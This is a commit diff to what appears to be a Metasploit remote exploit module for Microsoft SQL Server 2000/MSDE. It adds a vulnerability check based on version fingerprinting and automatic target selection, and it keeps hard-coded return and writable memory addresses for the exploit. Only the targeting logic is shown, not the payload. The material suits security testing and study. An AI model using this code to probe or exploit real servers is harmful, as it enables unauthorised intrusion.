add check and auto-target selection
git-svn-id: file:///home/svn/framework3/trunk@8048 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
9bf88af0cc
commit
e2a0ff92ce
|
@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# Individual targets
|
# Individual targets
|
||||||
#
|
#
|
||||||
[
|
[
|
||||||
'MSSQL 2000 / MSDE <= SP2',
|
'MSSQL 2000 / MSDE',
|
||||||
{
|
{
|
||||||
'Writable' => 0x42b6cfe0,
|
'Writable' => 0x42b6cfe0,
|
||||||
'Ret' => 0x42b6be7b
|
'Ret' => 0x42b6be7b
|
||||||
|
@ -76,12 +76,43 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
))
|
))
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
info = mssql_ping
|
||||||
|
if (info and info.has_key?('Version'))
|
||||||
|
|
||||||
|
# TODO: better detection
|
||||||
|
if (info['Version'] =~ /8\.00\.194/)
|
||||||
|
return Exploit::CheckCode::Vulnerable
|
||||||
|
end
|
||||||
|
|
||||||
|
# dump the discovered info and return that we detected MSSQL
|
||||||
|
info.each_pair { |k,v|
|
||||||
|
print_status(" #{k + (" " * (15-k.length))} = #{v}")
|
||||||
|
}
|
||||||
|
return Exploit::CheckCode::Detected
|
||||||
|
end
|
||||||
|
return Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
mytarget = nil
|
mytarget = nil
|
||||||
if target.name =~ /Automatic/
|
if target.name =~ /Automatic/
|
||||||
# nothing yet...
|
print_status("Attempting automatic target detection...")
|
||||||
mytarget = targets[1]
|
info = mssql_ping
|
||||||
|
if (info and info.has_key?('Version'))
|
||||||
|
if (info['Version'] =~ /8\.00\./)
|
||||||
|
mytarget = targets[1]
|
||||||
|
elsif (info['Version'] =~ /9\.00\./)
|
||||||
|
mytarget = targets[2]
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
if mytarget.nil?
|
||||||
|
raise RuntimeError, "Unable to automatically detect the target"
|
||||||
|
else
|
||||||
|
print_status("Automatically detected target \"#{mytarget.name}\" from version \"#{info['Version']}\"")
|
||||||
|
end
|
||||||
else
|
else
|
||||||
mytarget = target
|
mytarget = target
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue